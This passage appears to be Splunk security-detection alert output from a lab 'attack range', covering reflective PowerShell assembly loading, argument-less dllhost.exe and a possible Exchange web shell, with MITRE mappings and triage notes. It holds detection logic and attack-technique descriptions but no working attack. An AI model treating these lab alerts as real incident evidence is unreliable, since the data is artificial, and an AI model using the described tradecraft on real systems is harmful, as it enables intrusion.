win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664830532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T19:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T19:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664823600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664823600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="6056", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664823600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664823600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x17a8", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664826932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T18:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T18:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664826932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T18:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T18:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664826932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T18:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T18:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664826932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T18:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T18:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664826231, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="2", dest="exchange01.attackrange.local", firstTime="2022-10-03T17:58:42", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T17:58:42", original_file_name="unknown", parent_process="unknown", process="unknown", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="unknown" 1664826231, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="2", dest="exchange01.attackrange.local", firstTime="2022-10-03T17:58:42", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T17:58:42", original_file_name="Cmd.Exe", parent_process="c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"MSExchangeOWAAppPool\" -v \"v4.0\" -c \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\bin\\GenericAppPoolConfigWithGCServerEnabledFalse.config\" -a \\\\.\\pipe\\iisipmb991e788-0137-49d8-bf80-6e84f2791064 -h \"C:\\inetpub\\temp\\apppools\\MSExchangeOWAAppPool\\MSExchangeOWAAppPool.config\" -w 